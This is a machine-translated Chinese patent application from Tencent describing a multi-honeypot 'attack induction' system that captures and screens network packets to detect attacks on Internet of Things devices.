CN114765553A

CN114765553A - Security management method and device for access data, computer equipment and storage medium

Info

Publication number: CN114765553A
Application number: CN202110032177.XA
Authority: CN
Inventors: 李伟; 赵天星; 韩景维; 张洪睿; 张瑜龙
Original assignee: Tencent Technology Shenzhen Co Ltd
Current assignee: Tencent Technology Shenzhen Co Ltd
Priority date: 2021-01-11
Filing date: 2021-01-11
Publication date: 2022-07-19
Anticipated expiration: 2041-01-11
Also published as: CN114765553B

Abstract

The embodiment of the application relates to the technical field of cloud, and provides a security management method, a security management device, computer equipment and a storage medium for access data, which can identify and process the attack behavior of an accessor, specifically can acquire an access data packet received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems; determining the screening sequence and the screening rule of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; determining an attack data packet in the access data packet of the attack induction subsystem based on the screening sequence and the screening rule; based on the determined attack risk of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract attack behaviors with richer types, based on the plurality of attack induction subsystems, the attack induction system with strong capturing capability can be formed, and the identification range and the identification capability of the attack data are improved.

Description

Security management method and device for access data, computer equipment and storage medium

Technical Field

The embodiment of the application relates to the technical field of cloud, in particular to a security management method and device for access data, computer equipment and a storage medium.

Background

In the related art, honeypots can be deployed in a network to trap network-specific attack behaviors, but in some technical fields, the number and types of related client devices are large, for example, in the technical field of the internet of things, the internet of things has various types of client devices which can be attacked by attackers and are large in number based on the characteristic that networking objects in the internet of things are various.

Therefore, for the security of a system with a large number of client devices and types, a solution for analyzing and processing various attacks in the system so as to improve the security of the system is needed.

Disclosure of Invention

The embodiment of the application provides a security management method and device for access data, computer equipment and a storage medium, which can effectively detect various attacks which may occur in a system with a large number of client equipment and types, and are beneficial to improving the security of the system.

In order to solve the foregoing technical problem, an embodiment of the present application provides a security management method for accessing data, where the method includes:

the method comprises the steps that an access data packet received by at least one induction server in an attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;

determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;

if the currently screened attack inducing subsystems are arranged at the most front positions in the screening sequence, determining attack data packets in the access data packets based on screening rules corresponding to the currently screened attack inducing subsystems and the access data packets received by the currently screened attack inducing subsystems;

if the currently screened attack inducing subsystem is not arranged at the most front position in the screening sequence, obtaining a sending user of the screened attack data packet based on the screening result of the screened attack inducing subsystem, determining the access data packet sent by the sending user as an attack data packet from the access data packets received by the currently screened attack inducing subsystem, and determining the attack data packet in the non-screened access data packet based on the screening rule corresponding to the currently screened attack inducing subsystem and the non-screened access data packet of the currently screened attack inducing subsystem;

and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

In order to solve the foregoing technical problem, an embodiment of the present application further provides a security management apparatus for accessing data, where the apparatus includes:

the system comprises a data packet acquisition unit and a data packet acquisition unit, wherein the data packet acquisition unit is used for acquiring an access data packet received by at least one induction server in an attack induction system, the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

the screening scheme determining unit is used for determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;

a screening object determining unit, configured to determine a currently screened attack-inducing subsystem based on a screening order of each attack-inducing subsystem;

the first screening unit is used for determining an attack data packet in the access data packets based on a screening rule corresponding to the currently screened attack inducing subsystem and the access data packets received by the currently screened attack inducing subsystem if the currently screened attack inducing subsystem is arranged at the most front position in the screening sequence;

a second screening unit, configured to, if the currently-screened attack inducing subsystem is not arranged at the most front position in the screening order, obtain a sending user of a screened attack data packet based on a screening result of the screened attack inducing subsystem, determine, from access data packets received by the currently-screened attack inducing subsystem, that an access data packet sent by the sending user is an attack data packet, and determine, based on a screening rule corresponding to the currently-screened attack inducing subsystem and an unscreened access data packet of the currently-screened attack inducing subsystem, an attack data packet in the unscreened access data packet;

and the processing unit is used for processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

In an optional example, the security management apparatus for accessing data further includes a deployment unit configured to:

before a data packet acquisition unit acquires an access data packet received by at least one induction server in an attack induction system, acquiring a system deployment file of an attack induction subsystem in the attack induction system;

deploying the server inducing equipment of the attack inducing subsystem in a public network and deploying the inducing client equipment of the attack inducing subsystem in a corresponding client deployment network based on the deployment mode and the system deployment file corresponding to the attack inducing subsystem, wherein the server inducing equipment comprises an inducing server.

In one optional example, the attack inducement subsystem comprises at least two associated attack inducement subsystems that share a first inducement server;

a deployment unit to:

deploying the first induction server in a public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;

deploying other server inducing devices except the first inducing server in the server inducing devices of the associated attack inducing subsystems according to the deployment mode and the system deployment file of each associated attack inducing subsystem;

and deploying the induced client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.

In an optional example, the correlated attack inducement subsystem comprises a first attack inducement subsystem, a deployment unit for:

simulating induced client equipment which needs to be set in a first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and a system deployment file;

and running a first target protocol in the public network that is required to simulate the service provided by the inducement client device.

In an optional example, the correlated attack inducement subsystem comprises a second attack inducement subsystem, a deployment unit for:

acquiring intranet access information of entity client equipment connected in a target intranet according to the deployment mode of the second attack induction subsystem and the system deployment file;

and determining the entity client equipment as induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the intranet access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.

In an optional example, the attack guidance subsystem includes a third attack guidance subsystem, a deployment unit configured to:

deploying server-side induction equipment based on a target Internet of things protocol in the public network based on the deployment mode and the system deployment file of the third attack induction subsystem;

simulating Internet of things protocol client equipment based on the target Internet of things protocol in a target intranet to obtain induction client equipment of the third attack induction subsystem;

and in the target intranet, simulating and operating an application program of the Internet of things protocol client equipment so as to simulate the operation of the Internet of things protocol client equipment.

In an optional example, the first screening unit is configured to:

acquiring a corresponding analysis data packet for an access data packet received by a currently screened attack inducer system;

acquiring access behavior characteristic information corresponding to the analysis data packet, and determining a suspicious analysis data packet in the analysis data packet based on the access behavior characteristic information;

and performing feature matching on the suspicious analysis data packet based on the attack feature information of the attack data packet preset in the screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on the matching result.

In an optional example, the first screening unit is configured to:

acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;

acquiring access characteristics of a sending user of the analysis data packet based on the data of the analysis data packet;

and if the protocol for analyzing the data packet is a preset protocol in the screening rule corresponding to the currently screened attack inducing subsystem and/or the corresponding access characteristic accords with the specific access characteristic of a preset suspicious user in the screening rule corresponding to the currently screened attack inducing subsystem, determining that the analyzed data packet is a suspicious analyzed data packet.

In an optional example, the first screening unit is configured to:

performing keyword matching on the suspicious analysis data packet based on the attack data packet keywords preset in the screening rule corresponding to the currently screened attack induction subsystem;

determining the suspicious analyzed data packet which is successfully matched as a high suspicious analyzed data packet;

and determining an attack data packet in the access data packet based on the high suspicious analysis data packet.

In an optional example, the screening unit is configured to:

if the payload of the highly suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rule corresponding to the currently screened attack induction subsystem; and/or the associated content associated with the internet of things protocol in the highly suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or the data of the highly suspicious analysis data packet has the attack characteristics of the preset attack network method in the screening rule corresponding to the currently screened attack induction subsystem;

and determining the access data packet corresponding to the high suspicious analysis data packet as an attack data packet.

In an optional example, the processing unit is to:

determining attack data packets of the same sending user aiming at all attack induction subsystems according to the information of the sending user of the attack data packets, and using the attack data packets as user-associated attack data packets of the sending user;

determining the attack risk of the user-associated attack data packets of the same sending user according to the number of the user-associated attack data packets of the same sending user, the number and the attack inducing capacity of the attack inducing subsystems attacked by the user-associated attack data packets and the screening rule hit by the user-associated attack data packets;

processing the user-associated attack data packet according to a processing mode corresponding to the attack risk according to the attack risk of the user-associated attack data packet of the same sending user;

in an optional example, further comprising: a statistics unit to:

acquiring statistical information of the attack data packet on at least one abnormal traffic statistical dimension based on data in the analysis data packet of the attack data packet;

and generating an abnormal flow statistic report based on the statistic information.

In an optional example, the security management apparatus for accessing data further includes: and the information sending unit is used for sending the abnormal flow statistic report to the management terminal when an abnormal flow checking instruction sent by the management terminal is received after the processing unit generates the abnormal flow statistic report based on the statistic information, so that the management terminal can display an abnormal flow checking page based on the abnormal flow statistic report.

In some embodiments of the present invention, there may also be provided a computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the steps of the method as described above when executing the computer program.

In some embodiments of the invention, there may also be provided a storage medium having stored thereon a computer program which, when run on a computer, causes the computer to perform the steps of the method as described above.

By adopting the scheme provided by the embodiment of the application, the access data packet received by at least one induction server in the attack induction system can be obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server; determining the screening sequence and the screening rule of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; screening the data packets of the attack induction subsystem based on the screening sequence and the screening rule to determine attack data packets; based on the determined attack risk of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract more abundant attack behaviors, an induction server in the attack induction system can receive more attack data packets, the attack data packets are detected in a targeted manner through an attack data packet screening scheme corresponding to each attack induction subsystem, a detection result with higher accuracy is obtained, vulnerability discovery of more devices is facilitated, and the industrial safety of a system with various types and quantities of client devices is improved.

Drawings

Fig. 1 is a schematic diagram of a network architecture in which the present solution is implemented in the embodiment of the present application;

FIG. 2a is a schematic flow chart illustrating a security management method for access data according to an embodiment of the present application;

FIG. 2b is a schematic structural diagram of a security management system for accessing data according to an embodiment of the present application;

FIG. 2c is another schematic diagram of a security management system for accessing data according to an embodiment of the present application;

fig. 2d is a schematic diagram illustrating screening of attack packets in the embodiment of the present application;

FIG. 3 is a detailed flowchart of a security management method for access data according to an embodiment of the present application;

FIG. 4 is a schematic structural diagram of a security management device for accessing data in an embodiment of the present application;

fig. 5 is a schematic structural diagram of a computer device in an embodiment of the present application.

Detailed Description

The terms "first," "second," and the like in the description and in the claims of the embodiments of the application and in the drawings described above are used for distinguishing between similar elements and not necessarily for describing a particular sequential or chronological order. It will be appreciated that the data so used may be interchanged under appropriate circumstances such that the embodiments described herein may be practiced otherwise than as specifically illustrated or described herein. Furthermore, the terms "comprise" and "have," and any variations thereof, are intended to cover non-exclusive inclusions, such that a process, method, system, article, or apparatus that comprises a list of steps or modules is not necessarily limited to those steps or modules expressly listed, but may include other steps or modules not expressly listed or inherent to such process, method, article, or apparatus, such that the division of modules presented in the present application is merely a logical division and may be implemented in a practical application in a different manner, such that multiple modules may be combined or integrated into another system or some features may be omitted or not implemented, and such that couplings or direct couplings or communicative connections shown or discussed may be through interfaces, indirect couplings or communicative connections between modules may be electrical or the like, the embodiments of the present application are not limited. Moreover, the modules or sub-modules described as separate components may or may not be physically separated, may or may not be physical modules, or may be distributed in a plurality of circuit modules, and some or all of the modules may be selected according to actual needs to achieve the purpose of the embodiments of the present application.

The embodiment of the application provides a security management method and device for access data, computer equipment and a storage medium.

In this embodiment, the computer device may be a terminal or a server, and the terminal may include a mobile terminal and a fixed terminal. The mobile terminal includes, but is not limited to, any terminal capable of running an online education course application, such as a smart phone, a tablet computer, a notebook computer, a smart car, and the like, and the fixed terminal includes, but is not limited to, a desktop computer, a smart television, and the like.

The server may be an independent physical server, a server cluster or a distributed system formed by a plurality of physical servers, or a cloud server providing basic cloud computing services such as a cloud service, a cloud database, cloud computing, a cloud function, cloud storage, a network service, cloud communication, a middleware service, a domain name service, a security service, a CDN, a big data and artificial intelligence platform, but is not limited thereto.

Referring to fig. 1, fig. 1 shows a security management system for accessing data according to this embodiment, which may include an attack guidance system 10 and a laboratory server 20, where the attack guidance system 10 includes at least two attack guidance sub-systems 11, each attack guidance sub-system 11 includes at least one guidance client device (not shown in fig. 1) and a guidance server 111 with the capability of accessing the guidance client device, and optionally, the deployment manner of the guidance client device in different attack guidance sub-systems may be different.

Wherein, the laboratory server 20 and each inducement server 111 are connected via a network, such as a wireless network.

The induction server 111 of the present embodiment may receive the access packet from the access device, store the access packet, and transmit the stored access packet to the laboratory server 20 upon receiving the packet acquisition request of the laboratory server 20.

The laboratory server 20 may be configured to obtain an access data packet received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, and each attack induction subsystem includes an induction server and at least one induction client device connected to the induction server; determining the screening sequence and the screening rule of the attack data packets of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem; if the currently screened attack inducing subsystems are arranged at the most front positions in the screening sequence, determining attack data packets in the access data packets based on screening rules corresponding to the currently screened attack inducing subsystems and the access data packets received by the currently screened attack inducing subsystems; if the currently screened attack inducing subsystems are not arranged at the most front positions in the screening sequence, obtaining a sending user of the screened attack data packets based on the screening result of the screened attack inducing subsystems, determining the access data packets sent by the sending user as the attack data packets from the access data packets received by the currently screened attack inducing subsystems, and determining the attack data packets in the unseen access data packets based on the screening rules corresponding to the currently screened attack inducing subsystems and the unseen access data packets of the currently screened attack inducing subsystems; and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

The embodiment of the application provides a security management method for accessing data, which can be executed by a processor of a computer device.

Referring to fig. 2a, the method for securely managing access data may include:

201. the method comprises the steps that an access data packet received by at least one induction server in an attack induction system is obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

in this embodiment, the induction server in the attack induction subsystem has the capability of accessing the induction client device in the same attack induction subsystem.

In one example, the deployment patterns of the different attack inducement subsystems, and the deployment patterns of the inducement client devices in the subsystems, may be different. The deployment mode of the embodiment may include a honeypot technology used when the attack inducement subsystem is deployed, and a setting mode in which the inducement client device is set in the subsystem. The honeypot technology is different, the deployment mode is different, and the deployment modes of the entity induction client device and the virtual induction client device are also different.

The attack guidance subsystem in this embodiment is a system that simulates the structure and functional structure of a certain specific system, and its important function is to attract and capture attack data packets that attack the specific system, and the structure and composition of the attack guidance subsystem are determined by the structure and composition of the specific system.

For example, in one example, the attack inducement subsystem may be a disguised internet of things system constructed based on internet of things characteristics, which includes a server inducement device and an inducement client device.

In an attack induction subsystem, the server induction device may include devices required by a server in a real internet of things system, such as a server, a switch, and the like.

In one attack inducement subsystem, the client devices impersonated by the inducement client device may include devices located at the client in the real internet of things system, such as a router, a smart television, a camera, a smart refrigerator, and the like.

Of course, it is understood that in the same attack inducement subsystem, the server inducement device may access the inducement client device.

The attack induction subsystems in this embodiment can be implemented based on honeypot technology in the prior art, each attack induction subsystem can be regarded as a honeypot constructed based on characteristics of the internet of things, and the attack induction system in this embodiment can be regarded as a honeypot system composed of a plurality of honeypots.

The honeypot is a network security active defense platform which simulates the real network environment, real application programs and real business logic of an enterprise and provides similar actual combat. The target of the attack of the hacker can be provided through the loophole and the like, the hacker is induced to attack in the future, the effect of delaying the hacker through cheating is achieved, therefore, the attack behavior of the hacker can be identified and collected, when the method is applied to the field of the Internet of things, the attack behavior in the field of the Internet of things can be found, more loopholes of unknown equipment can be found, the method is beneficial to deploying targeted protection measures in the actual Internet of things, and the defensiveness and the safety of the Internet of things are improved.

In this embodiment, the types of honeypots include, but are not limited to, low-interaction honeypots, medium-interaction honeypots, and high-interaction honeypots.

The low-interaction honeypot is mainly characterized by simulation, and all attack weaknesses and attack objects displayed by the honeypot for an attacker are not real product systems, but are simulated for various systems and services provided by the systems. Because its services are all simulated behaviors, honeypots have very limited information available and can only respond simply to attackers, which is the most secure type of honeypot.

The medium interactive honeypot is a simulation of various behaviors of a real operating system, provides more interactive information, and can obtain more information from the behavior of an attacker. In this system of simulated behavior, honeypots may appear indistinguishable from a true operating system. They are also attractive targets for attacks by real systems.

The high-interaction honeypot has a real operating system, and has the advantage that the real system is provided for an attacker, and when the attacker obtains the ROOT authority, more activities and behaviors of the attacker can be recorded by the confusion of the system and the authenticity of data. Of course, the disadvantage is that the possibility of intrusion is high, and if the whole high-interaction honeypot is intruded, it becomes the springboard for the attacker to attack next.

In this embodiment, the attack induction subsystem may be set based on the honeypot technology described above, and it can be understood that different attack induction subsystems may be set using the same type of honeypot technology, for example, both attack induction subsystems are low-interaction honeypots, but the deployment modes of the induced client devices in the two attack induction subsystems are different.

In this embodiment, the induction server may be deployed based on Cloud technology (Cloud technology). For example, deployment is realized based on cloud computing (cloud computing), cloud storage (cloud storage) and the like in cloud technology.

In this embodiment, a cloud technology is explained first, and the cloud technology is based on a general term of a network technology, an information technology, an integration technology, a management platform technology, an application technology, and the like applied in a cloud computing business model, and can form a resource pool, which is used as needed, and is flexible and convenient. Cloud computing technology will become an important support. Background services of the technical network system require a large amount of computing and storage resources, such as video websites, picture-like websites and more web portals. With the high development and application of the internet industry, each article may have an own identification mark and needs to be transmitted to a background system for logic processing, data of different levels can be processed separately, and various industry data need strong system background support and can be realized only through cloud computing.

Since many hacking attacks use a method of continuously sending attack data packets, the amount of data packets received by the induced server is generally large, and the induced server can be well provided with computing power based on the cloud technology.

The cloud computing refers to a delivery and use mode of an IT infrastructure, and refers to acquiring required resources in an on-demand and easily-extensible mode through a network; the generalized cloud computing refers to a delivery and use mode of a service, and refers to obtaining a required service in an on-demand and easily-extensible manner through a network. Such services may be IT and software, internet related, or other services. In this embodiment, the cloud computing service may provide cloud server resources required by deploying the induction server for this embodiment, and it can be understood that, in the attack induction subsystem implemented by using different honeypot technologies, the sizes of resources required by the induction server may be different, for example, a required server port, a protocol that needs to be run, services that may be provided for a client, and the like may be different, so that the cloud server is implemented by using the cloud server in this embodiment, effective utilization of cloud server resources may be implemented, and waste of server resources is avoided.

Cloud storage is a new concept extended and developed from a cloud computing concept, and a distributed cloud storage system (hereinafter referred to as a storage system) refers to a storage system which integrates a large number of storage devices (storage devices are also referred to as storage nodes) of different types in a network through application software or application interfaces to cooperatively work through functions of cluster application, a grid technology, a distributed storage file system and the like, and provides data storage and service access functions to the outside. For example, the server stores an electronic map, a spatial unit, user data, and the like.

In this embodiment, the access data packet received by the induction server may be stored in a corresponding cloud database based on a cloud storage technology.

The guidance server in this embodiment may be a server deployed on a public network, and the deployment network of the guidance client device is not limited, and may be deployed on the public network or some internal networks as needed.

For the convenience of understanding the scheme of the present embodiment, the deployment scheme of the attack inducing system in the present embodiment is described herein.

In this embodiment, before step 201, deployment of the attack guidance system may be performed, and optionally, the scheme for deploying the attack guidance system may include:

acquiring a system deployment file of an attack inducer subsystem in an attack inducer system;

based on the deployment mode and system deployment file corresponding to the attack guidance subsystem, deploying server-side guidance equipment of the attack guidance subsystem in the public network, and deploying guidance client-side equipment of the attack guidance subsystem in the corresponding client deployment network, wherein the server-side guidance equipment comprises a guidance server.

The system deployment file of each attack induction subsystem may include a system deployment file of a server and a system deployment file of a client.

It is understood that the system deployment file of the server may include configuration information of the server inducing device, for example, a simulation program of the server inducing device, and the like. Of course, the system deployment files of the server may be different in different attack induction subsystems.

Generally, the system deployment files of the clients are generally different among different attack inducing subsystems.

In this embodiment, the server-side induction device of the attack induction subsystem may be deployed based on the deployment mode and the system deployment file of the server, and then the corresponding induction client device may be deployed based on the system deployment file of the client on the basis that the server-side induction device has been deployed.

For example, on the basis that the inducing device at the server is already deployed, a server port used by each inducing client device in the same attack inducing subsystem is determined based on a protocol and a computation port of an inducing server, and the corresponding inducing client device is deployed based on the server port, a deployment mode and a system deployment file of the client.

In one example, each attack inducement subsystem may be respectively deployed with a different inducement server, and the deployment order of the different inducement servers is not limited in the deployment process of the attack inducement subsystem.

In one example, the deployment process of the attack guidance subsystem can be accelerated by a way that a plurality of attack guidance subsystems share the guidance server, so that resources are saved.

Optionally, in one example, the attack inducement subsystem comprises at least two associated attack inducement subsystems that share a first inducement server; the steps of deploying, based on the deployment mode and the system deployment file corresponding to the attack guidance subsystem, a server-side guidance device of the attack guidance subsystem in the public network and deploying an guidance client device of the attack guidance subsystem in the corresponding client deployment network may include:

deploying a first induction server in the public network based on a deployment mode of at least one associated attack induction subsystem and a system deployment file;

deploying other server side induction equipment except the first induction server in the server side induction equipment of the associated attack induction subsystem according to the deployment mode of each associated attack induction subsystem and the system deployment file;

and deploying the induction client equipment of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.

In this embodiment, in the associated attack guidance subsystem, the system deployment files of the server may be completely the same, or at least the deployment files of the first guidance server are the same.

In this embodiment, the first inducing server may be implemented based on a low-interaction honeypot technology or a medium-interaction honeypot technology, which is not limited in this embodiment.

In an example, the deployment order of the two associated attack inducement subsystems is not limited, and may be set as required, and the server-side inducement devices to be deployed in the two associated attack inducement subsystems may not be completely the same.

For example, one of the associated attack inducement subsystems may be a low-interaction honeypot, and the other associated attack inducement subsystem may be a real device honeypot (i.e., a server-side inducement device is implemented based on a physical device) implemented by an inducement server (or a server-side inducement device) that reuses the low-interaction honeypot

Optionally, in an example, the associated attack guidance sub-system includes a first attack guidance sub-system, and the step "deploy, according to the deployment mode of each associated attack guidance sub-system and the system deployment file, guidance client devices of each associated attack guidance sub-system in a corresponding client deployment network" may include:

simulating the induction client equipment which needs to be set in the first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and the system deployment file;

and running a first target protocol in the public network required to simulate the service provided by the induced client device.

In this example, the induction server and the induction client device are both in the public network, so a user in the public network can access the induction client device through the induction server, and the induction server can obtain and store the access data packet of the user.

Wherein the first target protocol includes but is not limited to: http (Hyper Text Transfer Protocol), ssh (Secure Shell Protocol), telnet Protocol, sip (Session Initiation Protocol), ftp (File Transfer Protocol), and the like.

Wherein different protocols may be used to simulate different services provided by the client device, such as simulating user web login services with simulated http, simulating user command line login services with simulated ssh, simulating user command line login services with simulated telnet, and so on.

It can be understood that the simulated protocols required for different inducing client devices may be different, for example, referring to fig. 2b, the extranet server 1 is an inducing server of this embodiment, and corresponding to the extranet server 1, inducing client devices such as a camera, a network phone, and a router are deployed on the same public network, the first target Protocol corresponding to the camera includes http and telnet protocols, and the first target Protocol corresponding to the network phone includes http and voip (Voice over Internet Protocol, Voice over IP) protocols.

In an example, the step of "deploying, according to the deployment mode and the system deployment file of each relevant attack guidance subsystem, guidance client devices of each relevant attack guidance subsystem in a corresponding client deployment network" may further include:

simulating induced client equipment which needs to be arranged in the first attack induction subsystem in a target intranet according to the deployment mode of the first attack induction subsystem and the system deployment file; running a first target protocol required by simulating and inducing the service provided by the client equipment in the target intranet;

and the intranet access information of the induction client device in the target intranet is exposed in the public network, so that a public network user can access the induction client device through the first attack server.

In one example, the inducement client device includes a router having a public network IP address on a public network.

Wherein the exposure includes, but is not limited to, intranet penetration.

Optionally, the step of "exposing intranet access information inducing the client device in the target intranet to the public network" may include: and determining the entity client equipment as induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the intranet access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.

For example, a first access information mapping table (such as a NAT mapping table) for inducing the client device may be set, where the first access information mapping table is stored in a network device, such as a router, for inducing the client device to connect to, the mapping table includes intranet access information (such as an intranet IP address and port information) of the induced client device in a target intranet in the first attack induction subsystem, and public network access information obtained by mapping the intranet access information to a public network, where the public network access information includes a public network IP address (generally, a public network IP address of the router) and a port number, and the public network access information for inducing the client device in the public network is sent to the first induction server so as to be stored in the first induction server. An attacking user in the public network can obtain a public network access message of the inducing client device in the public network through the first inducing server, and sends an access data packet through the public network access message, after receiving the access data packet, the first inducing server sends the data packet to a router of the inducing client device based on public network access information, and the router can send the access data packet to the inducing client device in a target intranet based on the first access information mapping table.

Optionally, in this embodiment, the induction client device may be formed by an entity device. The associated attack induction subsystem includes a second attack induction subsystem, and the step of deploying the induction client device of each associated attack induction subsystem in the corresponding client deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file may include:

and determining the entity client device as an inducing client device of the second attack inducing subsystem, and exposing intranet access information of the entity client device in the public network.

Where the second attack inducement subsystem is a real device honeypot, in one example, the inducement server of the second attack inducement subsystem may be a different server than the first inducement server.

Of course, the first induction server is reused, so that the resource utilization rate and the system deployment efficiency can be improved. Optionally, in this embodiment, intranet access information of the entity client device in the target intranet may be read from the system deployment file, where the intranet access information includes, but is not limited to, information such as an IP address of the entity client device in the target intranet.

The manner of exposing intranet access information of the entity client device to the public network includes, but is not limited to, intranet penetration.

For example, the entity client device includes a terminal device and a network device used by a user, such as a gateway device, etc., a second access information mapping table (e.g., a NAT mapping table) may be set for the inducing client device in the second attack inducing subsystem, where the mapping table includes intranet access information (e.g., an intranet IP address and port information) of the inducing client device in a target intranet, and an intranet access information mapped to a public network IP address (typically, a public network IP address of a router) and a port number obtained by mapping the intranet access information to the public network, the second access information mapping table may be stored in the gateway device, and the public network IP address and the port number obtained by mapping the inducing client device are sent to the first inducing server for storage, thereby implementing intranet penetration.

In one example, a high-interaction honeypot can be built to enhance the trapping ability of the attack inducing system to hackers.

Optionally, the attack guidance subsystem includes a third attack guidance subsystem, and the step "based on the deployment mode and the system deployment file corresponding to the attack guidance subsystem, deploy the server guidance device of the attack guidance subsystem in the public network, and deploy the guidance client device of the attack guidance subsystem in the corresponding client deployment network" includes:

deploying server-side induction equipment based on a target Internet of things protocol in the public network based on a deployment mode and a system deployment file of a third attack induction subsystem, wherein the server-side induction equipment comprises a second induction server;

simulating Internet of things protocol client equipment based on a target Internet of things protocol in a target intranet to obtain induced client equipment of a third attack induction subsystem;

and in the target intranet, simulating an application program of the Internet of things protocol client equipment so as to simulate the operation of the Internet of things protocol client equipment.

In one example, the second inducement server is different from the first inducement server.

The target internet of things protocol may be any protocol used in the field of physical networks, including but not limited to MQTT ((message queue telemetry transport) protocol).

The server inducing device of the third attack inducing subsystem may be a server deployed based on MQTT protocol, and the inducing server is an MATT server (see the MQTT server in the high-interaction honeypot in fig. 2 c).

The target intranet of this embodiment is not limited, and may be a laboratory intranet, and the client device of the third attack guidance subsystem in this embodiment may include a plurality of MQTT clients.

In this embodiment, an application (e.g., device firmware) that directly runs the internet of things protocol client device may be run through a simulator, such as a QEMU simulator, to simulate the running of the device, so as to simulate the device itself.

202. Determining a screening sequence and a screening rule of the attack data of each attack induction subsystem according to the attack induction capability of the attack induction subsystem;

in this embodiment, before step 201, data in the induction server may be monitored, and the monitoring manner includes, but is not limited to, running a monitoring command such as a tcpdump related command on the induction server, monitoring data on a monitoring port of the induction server, and storing the monitored access data packet in a pcap file of the induction server, where the storage frequency is not limited, and for example, the storage frequency may be once per hour, that is, the access data packet is obtained once per hour and is stored in the pcap file. The pcap file can be stored in a cloud database corresponding to the induction server.

In step 201, a pcap file may be obtained from a cloud database to extract an access data packet in the pcap file.

In this embodiment, the attack guidance capabilities of the different attack guidance subsystems are affected by the honeypot type of the attack guidance subsystem, including data of the guidance client device, and the like.

In one example, all the attack inducement subsystems may be considered to have the same attack inducement capability, and the screening order and the screening rule may be the same, that is, the same screening rule may be adopted to simultaneously screen the attack packets for the access packets of all the inducement subsystems. In this example, access packets from multiple induction servers may be stored together in a pcap file.

In one example, for different attack inducement subsystems, the actual attack inducement capacity may be determined in a certain manner, and then different screening orders may be adopted to screen attack packets. In this example, the pcap file may include a plurality of subfiles, and each subfile may store an access packet of the induction server.

In one example, after the server of the system where the security management device for accessing data is located obtains the access data packet from the pcap file, the server may analyze the access data packet to obtain an analysis data packet, and store the analysis data packet in the database, so as to be used in the subsequent screening of the attack data packet.

When the access data packet is analyzed, the access data packet can be split according to the data type to obtain an analysis data packet.

The access data packet can be split according to the contents of ip address, port, access time, payload and the like, and then stored in a database for malicious traffic analysis (namely attack data packet analysis).

Alternatively, the number and content of the screening rules of different attack inducement subsystems may be different. The screening rule refers to a rule for determining an attack data packet, the screening dimension of the screening rule is not limited, and the number of the screening rules is not limited.

203. Determining the currently screened attack inducing subsystems based on the screening sequence of each attack inducing subsystem;

wherein, the currently screened attack inducement subsystems are the attack inducement subsystems with the most advanced screening sequence among the unseen attack inducement subsystems in the attack inducement subsystems.

It is to be understood that the number of currently screened attack-inducing subsystems may be at least one.

204. If the currently screened attack inducing subsystems are arranged at the most front positions in the screening sequence, determining attack data packets in the access data packets based on screening rules corresponding to the currently screened attack inducing subsystems and the access data packets received by the currently screened attack inducing subsystems;

in the example where the attack inducing ability of the attack inducing sub-systems is considered to be the same, the currently screened attack inducing sub-systems are all attack inducing sub-systems, and referring to fig. 2d, the analysis of the attack data packet can be roughly divided into four large steps: data screening, logic detection, fuzzy matching and precise matching.

Optionally, in an example, the step "determining an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack inducing subsystem and the access data packet received by the currently screened attack inducing subsystem" may include:

acquiring corresponding analysis data packets for access data packets received by all the attack inducement subsystems;

acquiring access behavior characteristic information corresponding to the analysis data packet based on the data of the analysis data packet; determining suspicious analysis data packets in the analysis data packets based on the access behavior characteristic information and the screening rules of the access behavior dimensions;

and performing attack feature matching on the suspicious analyzed data packet based on the attack feature information of the attack data packet preset in the screening rule, and determining the attack data packet in the access data packet based on the matching result.

The access behavior characteristic information may include a type of a protocol used and an access characteristic of the accessing party.

Optionally, the parsed data packet may be obtained from a database. The screening rule may include a protocol type preset for the suspicious analysis packet and an access characteristic of the access party. One protocol type may be regarded as a filter rule, and one access characteristic may also be regarded as a filter rule.

Wherein, the data screening step is carried out based on the protocol type, and the logic detection step is carried out based on the access characteristic.

Optionally, the step "obtains access behavior feature information corresponding to the analysis data packet based on the data of the analysis data packet; determining suspicious parsed data packets in the parsed data packets based on the access behavior feature information and the screening rules of the access behavior dimension "may include:

acquiring a protocol used for analyzing the data packet based on the data of the analysis data packet;

